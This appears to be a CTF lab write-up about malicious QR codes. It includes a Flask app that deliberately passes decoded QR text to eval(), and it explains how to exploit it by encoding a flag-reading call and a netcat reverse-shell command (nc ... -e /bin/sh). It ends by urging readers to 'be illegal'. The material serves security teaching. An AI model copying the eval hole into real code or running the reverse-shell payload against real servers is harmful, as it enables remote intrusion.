Hackwekend Session 0 - QRCode Vulnerabilities (Malicious QRCode gain access to reverse shell level)

tags: vulnerable tutorials ctf research

Resource:

• QR Codes Exploitation: How to Mitigate the Risk?
• Create Malicious QR Codes to Hack Phones & Other Scanners
• Think before you scan: How fraudsters can exploit QR codes to steal money
• Qrljacking

So what kind of technology become grow up in COVID19 pandemic and became popular method used to on during terrible time is QRCode

So i have couple question about QRcode like:

• What the activity QRcode are doing during scan process ?
• It just normal process or we can make it becomes more dangerous, infection or normaling gain acces, isn't it ?
• Do we can control all of thing like computer through scan QRcode ?

–> So that one is reason why kind of thing which i want to exploit

Some a real information

• A recent research report on consumers revealed that 34% of respondents have zero privacy, security, financial, or other concerns while using QR Codes.
• Since any kind of malware or phishing links in QR Codes pose significant security risks for both enterprises and consumers, stringent security measures should be considered to mitigate the risk.
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

The target

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Scenerio: Because of not understanding from people with QRcode can make this one becomes juicy target for hacker. So basically, The work of us is using basic somekind QRGen and make the scanner on victim like server or any kind of that like mobile phones, hardware, … know that payload for malicious can do some kind of that with one. And yet thinks about it, we can get full control of that.

So what kind i do with malicious QRcode

What are QRcode ?

• QR codes are machine-readable data formats that are useful for anything that needs to be scanned automatically.
• Before QR codes, there were several other formats called linear barcodes, which also stored data in a way that was easy for machines to read.
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Many different types of linear barcodes exist, they aren't able to store a lot of information. Applications like shipping and automobile manufacture required a standard that would hold more data. The answer to the limitation of linear barcodes was 2D barcodes, which offer more storage resistance to having physical damage affect the information contained within.
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• So we got declare for AZcode like image above. Aztec code is a 2D, or matrix, machine-readable code that is similar in many ways to a QR code and can hold more information than a linear barcode.
• Other types of 2D barcodes can contain an extremely dense amount of data. The PDF417 format found on the back of most drivers licenses in the United States, for example, can encode up to 1800 ASCII characters.
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

What kind i do with that

• Nowaday, QRcontain be encoded with huge amount of character and it will do a lot of thing but somekind i can take advandge of that to create some fascinating application of QR codes like share connect wifi like WIFI:S:<SSID>;T:<WPA|WEP|>;P:<password>;H:<true|false|>;
• Which that example above we can imaginary how the hacker using that to hack with generate that QRcode they can do so much vulnerability (Posion from web app) like
  • SQL Injections
  • XSS
  • Command Injection
  • Format String
  • XXE
  • String Fuzzing
  • SSI Injection
  • LFI / Directory Traversal

CyberCrime can cause by QRcode

• Redirect you to a malicious website to steal sensitive information
• Download a malicious file on your device
• Trigger actions on your device
• Divert a payment or make requests for money
• Steal user identity or access to an application (Target do in this Lab)

Tips to Prevent

• Before scanning a QR code, check that it has not been tampered with; for example, verify that it doesn’t cover up another QR code.

• Refrain from scanning randomly found QR codes or codes in unsolicited messages.

• Exercise the same caution with the codes as when handling links or attachments in emails or messaging apps.

• Be very careful when it comes to using a QR code to pay a bill or conduct another kind of financial transaction. Consider using another payment option.

• Disable the option to perform automatic actions when scanning a QR code, such as visiting a website, downloading a file, or connecting to a Wi-Fi network.

• After scanning, look at the URL to check that it’s legitimate. Even so, it may often be better to avoid inputting your login or personal information on a site you’ve landed on via a QR code. If something feels off, open a browser and type the URL yourself.

• Do not share QR codes containing sensitive information, such as those used to access apps or those included in documents and health certificates.

• When generating a QR code, use a reputable service. Such a service can also verify that the QR is genuine and performs the desired action.

• Keep your apps up-to-date and use security software.

Lab Time

So after time to build a lab and it was done. So i prefer to coming back and talk about the progress when building it and what should we do with malicious qrcode to gainning access to victim

Like you know i am a CTFplayer, therefore i try to make vulnerability in like CTFchallenge. It can be easy for anyone want to approach

Language and Package for start

• Python (Main language)
• Flask (Web framework)
• qrtool (Lib for play with qr)
• PIL (Lib for image progressing)
• pyzbar (Lib for play with qr)

–> That was enough to me for building this challenge

The Structure

• Basic structure with app for of function of website
• Templates for storage html ==> Help to redirect by flask
• Static contain images and script if u want but it not need now

Detail source code

#! app.py
from flask import Flask, render_template, request, make_response, redirect, flash
from pyzbar.pyzbar import decode
from PIL import Image
import random

def decodeQR_code(image):
    decodeQR= decode(Image.open(image))
    return decodeQR[0].data.decode('ascii')

def isvalidimage(image):
    im = Image.open(image)
    w, h = im.size
    if w != h:
        return False
    else:
        return True
    
app = Flask(__name__)
app.secret_key = "secret key"

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/auth')
def authentication_doc():
    url_ran = ['https://www.freecodecamp.org/news/how-to-authenticate-users-in-flask/', 
    'https://realpython.com/using-flask-login-for-user-management-with-flask/', 
    'https://testdriven.io/blog/flask-spa-auth/', 
    'https://fiverr-res.cloudinary.com/images/t_main1,q_auto,f_auto,q_auto,f_auto/gigs/129737214/original/49d95bd5e47653963b30ed02ca1aec87174a83e5/create-professional-qr-codes.png']
    pick = random.choices(url_ran, cum_weights=(40,50,20,0.000000000001), k=1)[0]
    return redirect(pick)

@app.route('/qr', methods=['GET'])
def QRoauth():
    return render_template('qrcode.html')

@app.route('/qr', methods=['POST'])
def QRsubmit():
    if 'file' not in request.files:
        flash('No file part')
        return redirect('qrcode_submit.html')
    file = request.files['file']
    if file.filename == '':
        flash('No image selected for uploading')
        return redirect('qrcode_submit.html')
    if file:
        if isvalidimage(file):
            decode_string = decodeQR_code(file)
            print(decode_string)
            if decode_string == "":
                flash('submit complete, how to you know wat your blob ? think what you got and try again')
                return render_template('qrcode_submit.html')
            else:
                flash('submit complete, what a good think? qr here you are ' + eval(decode_string))
                return render_template('qrcode_submit.html') 
        else:
            flash('think far about the image you submit, it should be had same between width and height')
            return render_template('qrcode_submit.html')

@app.route('/gow')
def gow():
    return render_template('gow.html')
    

app.run(debug=True)

#! templates/gow.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>godofwar</title>
</head>
<body>
    <img src="https://cdn-img.thethao247.vn/origin_768x0/storage/files/haibui/2022/11/09/sieu-pham-god-of-war-ragnarok-chinh-thuc-ra-mat-215580.png" 
        style="display: block;margin-left: auto;margin-right: auto;">
    <p hidden>This is why you need to read a metadata concept of ragnarok: uggcf://ra.jvxvcrqvn.bet/jvxv/DE_pbqr</p> 
</body>
</html>

!# templates/index.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HackerSide</title>
</head>

<body>
    <div style="display: flex;justify-content: center;align-items: center;text-align: center;min-height: 50vh;">
        <h1 style="display:inline;text-align: center;">
            <code>This is the manual book of website? What you think about that ????</code></h1>
    </div>
    <div style="display: flex; align-items: center; font-size: large; place-content: space-evenly;">
        <tr>
            <li><code><a href="/auth">Authentication method</a></code></li>
            <li><code><a href="/qr">Submit</a></code></li>
            <li><code><a href="/gow">God of war</a></code></li>
        </tr>
    </div>
</body>

</html>

!# templates/qrcode_submit.html
<!Doctype html>
<title>Hey QRcode submit</title>
<p>
	{% with messages = get_flashed_messages() %}
	  {% if messages %}
		<ul>
		{% for message in messages %}
		  <li><code>{{ message }}</code></li>
		{% endfor %}
		</ul>
	  {% endif %}
	{% endwith %}
</p>

#! templates/qrcode.html
<!DOCTYPE html>
<title>Hey, QR submit check the out</title>
<h2 style="text-align: center;display:flex;justify-content: center;">Select a file to upload</h2><br>
<div style="display: flex;justify-content: center;align-items: center;text-align: center">
<form method="post" action="/qr" enctype="multipart/form-data">
    <dl>
		<p>
			<input type="file" name="file" autocomplete="off" required>
		</p>
    </dl>
    <p>
		<input type="submit" value="Submit">
	</p>
</form>
</div>

• This is bunch of code for my processing and target i want to expect but target about the vulnerable with malicious qrcode
• So focus on app.py because it contains me idea for creating that trick
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
  • So as first we have 2 of function for check and decodeqr and so it work exactly i want
  • Nevermind what it to much but somekind it will give u idea in submitting
  • So i need to app.secret_key = "secret key" - set about secret key to return to view because it try to pass some unique in Flask - helpful
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
    
    
  • So with that dir, i just make the people can try to lucky for get the idea of challenge but it have 0.000000000001/(40+50+20+0.000000000001) can occur so it hard to try this
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
    
    
  • So with that directory is keep to suggest the method to exploit this challenge so we can reach the gow.html
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
    so very basic but if you careful you can get the ROT13 strings on the hidden value can see it on the web <p hidden>This is why you need to read a metadata concept of ragnarok: uggcf://ra.jvxvcrqvn.bet/jvxv/DE_pbqr</p> so drop it rot13 and decrypt it and that could i want to talk https://en.wikipedia.org/wiki/QR_code
  • But it just method to understand, reach the submit form u need to know that is form to submit qrcode image so how to exploit this reach next step

Exploit

@app.route('/qr', methods=['GET'])
def QRoauth():
    return render_template('qrcode.html')

@app.route('/qr', methods=['POST'])
def QRsubmit():
    if 'file' not in request.files:
        flash('No file part')
        return redirect('qrcode_submit.html')
    file = request.files['file']
    if file.filename == '':
        flash('No image selected for uploading')
        return redirect('qrcode_submit.html')
    if file:
        if isvalidimage(file):
            decode_string = decodeQR_code(file)
            print(decode_string)
            if decode_string == "":
                flash('submit complete, how to you know wat your blob ? think what you got and try again')
                return render_template('qrcode_submit.html')
            else:
                flash('submit complete, what a good think? qr here you are ' + eval(decode_string))
                return render_template('qrcode_submit.html') 
        else:
            flash('think far about the image you submit, it should be had same between width and height')
            return render_template('qrcode_submit.html')

• So this is what is do so if you click
• So if you find enough to bypass this u know it just accept qrcode
• So try upload the image type qrcode and so how to generate it - easily can find it on QRGen, so it contain many wordlist u can generate and try to gain access this web. But easily like i talk flag is flag and it just simple with it
• So if you submit on write payload, u got what you want and why we get that because it code i u eval() function the powerful function in python and any programming language. So many type to try bypass this but it just very easy question so try open('flag').read() to generate the qr code with it like
  
• But another way with that kind we can gain access to have shell of website so try to generate qrcode such as __import__('os').system('nc 0.0.0.0 9999 -e /bin/sh') and you whill got you want this PoC is upgrade for my progressing and wat i can reach to exploit the basic challenge
  
• The result if we submit is flag and shell of website
  
  
  
  
  
  

Happy hacking and be illegal for your purpose

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →